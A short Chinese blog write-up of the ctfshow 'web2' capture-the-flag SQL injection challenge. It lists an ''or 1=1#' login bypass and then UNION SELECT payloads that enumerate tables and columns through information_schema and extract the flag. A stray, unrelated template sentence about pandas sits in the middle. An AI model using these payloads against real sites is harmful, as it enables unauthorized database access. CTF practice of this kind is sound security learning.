ctfshow web2 writeup
这是本人第一次写blog,有不好的地方希望大家多多指出
从此开始踏上了网安的不归路,成为了一只web狗
从题目可以看出这是一道sql注入的题
示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。
首先我们尝试使用万能密码
admin
'or 1=1#
**这里可以发现我们已经登陆成功了
接下来我们使用联合查询来查询回显位置**
1’ or 1=1 union select 1,2,3 #
爆表
1’ or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #
成功
再接再厉,接下来就是爆字段
1’ or 1=1 union select 1, group_concat(column_name),3 from information_schema.columns where table_name=‘flag’#
胜利就在眼前**,进行最后一步,取数据**
1’or 1=1 union select 1,flag,3 from flag#
总结:
至此就已经完成了这道简单的sql注入题目,成功拿到flag